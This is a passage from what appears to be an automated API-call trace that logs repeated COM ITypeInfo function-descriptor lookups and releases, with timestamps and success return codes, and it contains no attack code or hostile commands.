ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.214] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x26, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.214] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.214] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x27, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.214] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.214] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x28, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.214] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.214] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x29, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.214] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.214] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x2a, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.214] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.214] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x2b, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.214] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.214] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x2c, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.214] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.214] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x2d, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.214] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.214] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x2e, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.214] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.214] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x2f, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.214] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.214] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x30, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.214] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.214] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x31, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.214] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.214] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x32, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.214] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.214] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x33, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.214] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.214] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x34, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.214] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.215] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x35, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.215] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.215] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x36, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.215] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.215] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x37, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.215] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.215] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x38, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.215] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.215] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x39, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.215] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.215] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x3a, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.215] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.215] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x3b, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.215] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.215] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x3c, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.215] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.215] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x3d, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.215] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.215] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x3e, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.215] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.215] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x3f, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.215] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.215] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x40, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.215] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.215] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x41, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.215] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.215] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x42, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.215] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.215] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x43, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.215] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.215] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x44, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.215] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.215] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x45, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.215] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.215] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x46, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.215] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.215] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x47, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.215] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.216] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x48, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.216] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.216] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x49, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.216] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.216] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x4a, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.216] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.216] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x4b, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.216] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.216] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x4c, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.216] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.216] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x4d, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.216] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.216] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x4e, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.216] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.216] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x4f, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.216] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.216] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x50, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.216] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.216] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x51, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.216] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.216] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x52, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.216] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.216] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x53, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.216] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.216] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x54, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.216] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.216] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x55, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.216] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.216] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x56, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.216] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.216] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x57, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.216] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.216] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x58, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.216] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.216] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x59, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.216] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.216] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x5a, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.216] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.216] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x5b, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.217] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.217] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x5c, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.217] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.217] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x5d, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.217] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.217] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x5e, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.217] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.217] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x5f, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.217] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.217] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x60, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.217] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.217] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x61, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.217] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.217] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x62, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.217] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.217] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x63, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.217] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.217] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x64, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.217] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.217] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x65, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.217] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.217] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x66, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.217] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.217] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x67, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.217] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.217] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x68, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.217] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.217] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x69, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.217] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.218] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x6a, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.218] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.218] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x6b, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.218] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.218] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x6c, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.218] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.218] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x6d, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.218] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.218] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x6e, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.218] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.218] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x6f, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.218] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.218] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x70, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.218] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.218] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x71, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.218] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.218] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x72, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.218] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.218] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x73, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.218] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.218] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x74, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.218] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.218] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x75, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.218] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.218] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x76, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.218] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.218] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x77, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.218] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.218] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x78, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.218] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.218] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x79, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.218] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.218] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x7a, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.218] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.218] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x7b, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.218] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.218] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x7c, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.218] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.218] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x7d, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.218] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.219] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x7e, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.219] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.219] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x7f, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.219] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 0x0 [0060.219] ITypeInfo:RemoteGetFuncDesc (in: This=0x1d39d552b18, index=0x80, ppFuncDesc=0x33e4fb6ba8, pDummy=0x6 | out: ppFuncDesc=0x33e4fb6ba8, pDummy=0x6) returned 0x0 [0060.219] ITypeInfo:LocalReleaseFuncDesc (This=0x1d39d552b18) returned 